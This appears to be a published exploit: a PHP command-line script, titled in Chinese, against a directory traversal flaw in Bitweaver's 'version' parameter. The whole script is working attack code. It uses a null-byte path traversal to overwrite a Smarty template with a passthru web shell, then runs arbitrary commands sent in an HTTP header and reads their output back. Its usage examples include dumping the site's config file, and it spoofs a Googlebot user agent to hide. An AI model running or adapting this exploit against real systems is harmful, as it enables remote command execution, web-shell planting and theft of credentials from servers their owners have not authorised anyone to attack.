Bitweaver version参数目录遍历漏洞

<?php $err[0] = "[!] This script is intended to be launched from the cli!"; $err[1] = "[!] You need the curl extesion loaded!"; if (php_sapi_name() <> "cli") { die($err[0]); } if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl("php_curl.dll") ? die($err[1]) : nil; } else { !dl("php_curl.so") ? die($err[1]) : nil; } } function syntax() { print ( "Syntax: php ".$argv[0]." [host] [path] [user] [pass] [cmd] [options] \n". \ "Options: \n". \ "--port:[port] - specify a port \n". " \ default->80 \n". "--proxy:[host:port] - use \ proxy \n". "Examples: php ".$argv[0]." \ 192.168.0.1 /bitweaver/ bookoo pass ls \n". " php ".$argv[0]." \ 192.168.0.1 / bookoo pass ls -a --proxy:1.1.1.1:8080\n". " php \ ".$argv[0]." 192.168.0.1 / bookoo pass cat ../kernel/config_inc.php --port:81"); \ die(); } error_reporting(E_ALL); $host = $argv[1]; $path = $argv[2]; $_usr = $argv[3]; $_pwd = $argv[4]; $_cmd = ""; for ($i = 5; $i < $argc; $i++) { if ((!strstr($argv[$i], "--proxy:")) and (!strstr($argv[$i], "--port:"))) { $_cmd .= " ".$argv[$i]; } } $argv[5] ? print("[*] Command->$_cmd\n") : syntax(); $_use_proxy = false; $port = 80; for ($i = 3; $i < $argc; $i++) { if (stristr($argv[$i], "--proxy:")) { $_use_proxy = true; $tmp = explode(":", $argv[$i]); $proxy_host = $tmp[1]; $proxy_port = (int)$tmp[2]; } if (stristr($argv[$i], "--port:")) { $tmp = explode(":", $argv[$i]); $port = (int)$tmp[1]; } } function _s($url, $cmd, $is_post, $request) { global $_use_proxy, $proxy_host, $proxy_port, $cookie; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($is_post) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n"); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/1.0 (googlebot@googlebot.com \ http://googlebot.com/)"); curl_setopt($ch, CURLOPT_TIMEOUT, 0); curl_setopt($ch, CURLOPT_HEADER, 1); $headers = array("Cookie: $cookie", "Cmd: ".$cmd." > ./../readme"); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); if ($_use_proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port); } $_d = curl_exec($ch); if (curl_errno($ch)) { die("[!] ".curl_error($ch)."\n"); } else { curl_close($ch); } return $_d; } $my_template = "themes/templates/footer_inc.tpl"; $url = "http://$host:$port".$path."boards/boards_rss.php"; $_o = _s($url, "", 0, ""); if (stristr($_o, "404 Not Found")) { die ("[!] Vulnerable script not found!\n"); } //catch site cookie, this is needed for version compatibility, not needed in \ 2.6.0 $_tmp = explode("Set-Cookie: ", $_o); $cookie = ""; for ($i = 1; $i < count($_tmp); $i++) { $_tmpii = explode(";", $_tmp[$i]); $cookie .= $_tmpii[0]."; "; } print("[*] Cookie->".$cookie."\n"); $_o = _s($url, "", 1, "version=/\x00&"); $_o = _s($url, "", 1, "u=$_usr&p=$_pwd&version=/../../../../$my_template\x00&"); if (stristr($_o, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>")) { print ("[*] '$my_template' successfully overwritten!\n"); } else { print($_o); die("[!] Error! No write permission on /".$my_template." ..."); } if (stristr($_o, "{php}passthru(\$_SERVER[HTTP_CMD]);{/php}")) { print ("[*] Shell injected!\n"); } else { print($_o); die("[!] Error! Shell not injected!"); } $url = "http://$host:$port".$path."wiki/index.php"; $_o = _s($url, $_cmd, 0, ""); $url = "http://$host:$port".$path."readme"; $_o = _s($url, "", 0, ""); if (stristr($_o, "404 Not Found")) { die ("[!] stdout file not found!\n"); } else { print("[*] Success!\n".$_o); } ?>